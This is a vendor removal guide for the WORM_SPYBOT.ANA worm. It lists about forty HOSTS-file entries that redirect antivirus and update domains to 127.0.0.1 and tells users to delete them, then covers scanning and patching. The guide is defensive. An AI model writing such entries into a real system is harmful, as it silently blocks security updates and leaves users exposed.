Deleting malware entries from the HOSTS file removes all malware-made changes on host name association.

  1. Open the following file using a text editor (such as NOTEPAD):
    • On Windows NT, 2000, XP, and Server 2003:
      %System%\drivers\etc\HOSTS
  2. Delete the following entries:
    • 127.0.0.1 www.grisoft.com
    • 127.0.0.1 www.trendmicro.com
    • 127.0.0.1 trendmicro.com
    • 127.0.0.1 rads.mcafee.com
    • 127.0.0.1 customer.symantec.com
    • 127.0.0.1 liveupdate.symantec.com
    • 127.0.0.1 us.mcafee.com
    • 127.0.0.1 updates.symantec.com
    • 127.0.0.1 update.symantec.com
    • 127.0.0.1 www.nai.com
    • 127.0.0.1 nai.com
    • 127.0.0.1 secure.nai.com
    • 127.0.0.1 dispatch.mcafee.com
    • 127.0.0.1 download.mcafee.com
    • 127.0.0.1 www.my-etrust.com
    • 127.0.0.1 my-etrust.com
    • 127.0.0.1 mast.mcafee.com
    • 127.0.0.1 ca.com
    • 127.0.0.1 www.ca.com
    • 127.0.0.1 networkassociates.com
    • 127.0.0.1 www.networkassociates.com
    • 127.0.0.1 avp.com
    • 127.0.0.1 www.kaspersky.com
    • 127.0.0.1 www.avp.com
    • 127.0.0.1 kaspersky-labs.com
    • 127.0.0.1 kaspersky.com
    • 127.0.0.1 www.f-secure.com
    • 127.0.0.1 f-secure.com
    • 127.0.0.1 viruslist.com
    • 127.0.0.1 www.viruslist.com
    • 127.0.0.1 liveupdate.symantecliveupdate.com
    • 127.0.0.1 mcafee.com
    • 127.0.0.1 www.mcafee.com
    • 127.0.0.1 sophos.com
    • 127.0.0.1 www.sophos.com
    • 127.0.0.1 symantec.com
    • 127.0.0.1 securityresponse.symantec.com
    • 127.0.0.1 www.symantec.com
  3. Save the file and close the text editor.

Important Windows XP Cleaning Instructions

Users running Windows XP must disable System Restore to allow full scanning of infected computers.

Users running other Windows versions can proceed with the succeeding solution set(s).

Running Trend Micro Antivirus

If you are currently running in safe mode, please restart your computer normally before performing the following solution.

Scan your computer with Trend Micro antivirus and delete files detected as WORM_SPYBOT.ANA. To do this, Trend Micro customers must download the latest virus pattern file and scan their computer. Other Internet users can use HouseCall, the Trend Micro online virus scanner.

Applying Patches

This malware exploits known vulnerabilities in Windows. Download and install the fix patches provided by Microsoft from the following Web pages:

(Note: MS03-039 is the updated patch for MS03-026.)

Please go to the Veritas Web site for information on product patches.

Refrain from using this product until the appropriate patch has been installed. Trend Micro advises users to download critical patches upon release by vendors.




Trend Micro offers best-of-breed antivirus and content-security solutions for your corporate network, small and medium business, mobile device or home PC.